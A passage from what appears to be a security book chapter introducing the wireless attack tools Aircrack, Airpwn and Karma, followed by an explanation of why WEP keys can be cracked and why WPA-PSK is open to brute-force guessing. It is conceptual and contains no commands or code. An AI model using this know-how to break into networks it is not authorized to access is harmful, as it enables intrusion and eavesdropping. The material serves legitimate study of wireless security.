Wireless networks have become increasingly popular for personal and business use. Unfortunately, for wireless networks as for most other technological advances, security has been an afterthought. Thus, the current state of wireless technology is such that wireless networks in general are not secure by default and cannot be easily secured. The three tools (Aircrack, Airpwn, and Karma) presented in this chapter take advantage of weaknesses in 802.11 wireless networks in order to compromise them.
Aircrack monitors legitimate wireless traffic in order to crack the encryption key being used. Knowing this key allows an attacker to access the wireless network and paves the way for further attacks. Aircrack is introduced in Aircrack.
Airpwn monitors legitimate wireless traffic and, based on preconfigured search patterns, injects attacker-controlled data into the network, thus allowing for sophisticated attacks. Airpwn can use the WEP key uncovered by Aircrack to compromise encrypted networks. Airpwn is introduced in Airpwn.
Karma impersonates wireless networks, tricking careless wireless clients into connecting to an attacker-controlled network. Karma is introduced in Karma.
The chapter starts with a discussion of wireless encryption technology to establish the current state of wireless security.
Wireless Equivalent Privacy (WEP) is one method of securing the network. Most wireless vendors include it by default as part of the IEEE 802.11 standard. Upon initial release, WEP was considered a real advance in wireless security because it prevented eavesdroppers from intercepting and reading wireless network traffic. It also helped to prevent unauthorized individuals from using the wireless network because without the WEP key, they could not route their traffic to the device. It's important to understand WEP before examining the tools discussed in later sections, especially Aircrack.
Let's take a look at how a wireless network works and especially how WEP works. As you may already know, a wireless or Wi-Fi network uses radio signals to transmit data from connected PCs to a router, out to the Internet, and back again. Most wireless networks use either the 2.4 GHz or 5 GHz frequency. As just mentioned, most standard wireless routers that are built to follow the IEEE 802.11 standard have built-in (but not enabled by default) encryption to attempt to secure the traffic between systems and routers. Initially, most users did not bother enabling WEP; it wasn't the most user-friendly thing to do, and managing the key was an annoyance. Over the last few years, as the lack of security in wireless network has received more attention, users have started to enable the built-in encryption in the hope that it will make them secure. By the end of this section, you will understand that while WEP does add a level of protection, it does not prevent a wireless network from being compromised.
WEP uses both the RC4 stream cipher—the same cipher used in Secure Sockets Layer (SSL)—and then an integrity check that is CRC-32. Basically, there are two options a user can implement when using WEP: 64-bit and 128-bit WEP. 64-bit WEP is obviously weaker than 128-bit, but both keys can be compromised if enough encrypted network traffic is captured. The theory behind WEP is as follows: a standard 64-bit WEP uses a 40-bit key, which is concatenated by a 24-bit block known as the initialization vector. A 128-bit WEP key uses a 104-bit key size with the 24-bit initialization vector. So what's the problem? The use of a stream cipher means that the same traffic key should not be used twice, and the 24-bit initialization vector is supposed to ensure that this never happens. Unfortunately, on busy networks, a 24-bit initialization vector is not long enough to prevent the key from being used twice, which allows a patient attacker the opportunity to eventually crack the WEP key.
In response to the weaknesses discovered in WEP, a new method for encrypting traffic was implemented, known as Wi-Fi Protected Access (WPA). WPA was designed to distribute a different encryption key to each wireless device. Unfortunately, WPA also includes a shared key mode known as WPA-PSK that allows every device to share a password, weakening the security of the protocol. WPA is encrypted using an RC4 stream cipher with a 128-bit key, and a 48-bit initialization vector. In addition, WPA uses the Temporal Key Integrity Protocol (TKIP), which dynamically changes the key as the device is used. The combination of both TKIP and the larger 48-bit initialization vector prevents attacks that were previously successful against WEP. But when WPA is used with a preshared key (WPA-PSK), it is vulnerable to simple but effective brute-force password-guessing attacks.